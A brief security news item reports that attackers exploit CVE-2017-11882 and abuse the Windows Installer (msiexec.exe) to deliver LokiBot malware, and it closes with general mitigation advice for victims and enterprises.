Attack abuses Windows Installer service to deliver LokiBot

Trend Micro researchers discovered attackers are exploiting a previously patched Windows vulnerability (CVE-2017-11882) by abusing the Windows Installer service, msiexec.exe, to deliver LokiBot malware.

This is an uncommon and different method of installation of malware, according to the report. Previous attacks mainly used the Windows executable mshta.exe to run a Powershell script to download and execute the malware.

Palo Alto Networks published analysis on this type of exploit in the wild of CVE-2017-11882 back in December.

Trend Micro believes attackers are using the msiexec.exe to download a malicious MSI package in order to evade security software. Most security software historically detects traditional malware installation methods. 

As is usually the case, victims can avoid infection by following anti-phishing best practices.

Enterprises can also mitigate the threat by disabling or restricting Windows Installer from installing untrusted software (unless programs were authorized by the company’s system administrator). 

Leave a Reply

Close Menu